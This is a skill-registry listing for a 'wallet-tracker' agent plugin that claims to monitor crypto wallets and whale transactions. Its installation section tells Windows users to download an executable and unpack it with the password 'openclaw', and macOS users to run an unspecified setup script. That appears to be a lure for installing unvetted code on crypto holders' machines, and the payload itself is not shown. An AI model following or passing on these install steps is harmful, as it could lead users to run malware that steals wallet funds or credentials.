ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

wallet-tracker

Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.

Why use this skill?

Track Ethereum and Solana wallet transactions, whale movements, and portfolio changes in real-time with the OpenClaw wallet-tracker skill.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-bs5ur
Or

What This Skill Does

The wallet-tracker skill provides a robust framework for monitoring blockchain addresses across Ethereum, Solana, and other chains. By integrating directly with the openclaw-agent, this skill allows users to keep a pulse on whale movements, analyze portfolio shifts, and monitor token transfers in real-time. It bridges the gap between raw blockchain data and actionable insights, enabling automated monitoring of large transactions, NFT movements, and complex DeFi interactions. The utility is designed for users who need timely updates on specific wallet activities without manually querying multiple block explorers.

Installation

To begin using the wallet-tracker, ensure you have the openclaw-agent installed. For Windows, download the executable from the official repository and extract it using the password 'openclaw'. For macOS, execute the provided setup script via your Terminal. Once the environment is configured, install the skill by running the command: clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-bs5ur. Once installed, you can configure your API keys for Etherscan or Solana nodes to start pulling data.

Use Cases

  • Whale Alerting: Monitor high-net-worth wallets for significant capital shifts to detect potential market trends or large sell-offs.
  • Portfolio Auditing: Track your own multi-chain assets to receive notifications on token transfers and balance changes.
  • DeFi Analysis: Watch smart contract interactions and protocol engagements to stay informed on liquidity movements.
  • NFT Tracking: Monitor wallet addresses associated with rare NFT collections to see when assets are moved or listed on marketplaces.

Example Prompts

  1. "Check the last 10 transactions for the whale wallet at 0x71C... and let me know if there's any large ETH movement."
  2. "Monitor this Solana address 8x8... and alert me every time the SOL balance drops by more than 50 SOL."
  3. "Summarize the recent token transfer history for my Ethereum address and identify any significant ERC-20 token outflows."

Tips & Limitations

  • Rate Limiting: Be aware of your provider's API rate limits (e.g., Etherscan) to avoid service interruptions during high-frequency monitoring intervals.
  • Network Reliance: Real-time monitoring depends on your machine's connection to the openclaw-agent; ensure it remains active in the background for continuous tracking.
  • Data Precision: When parsing values, always account for token decimals provided by blockchain APIs to avoid misinterpreting balances.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-wallet-tracker-bs5ur": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#blockchain#defi#monitoring#crypto#web3
Safety Score: 3/5

Flags: network-access, external-api, code-execution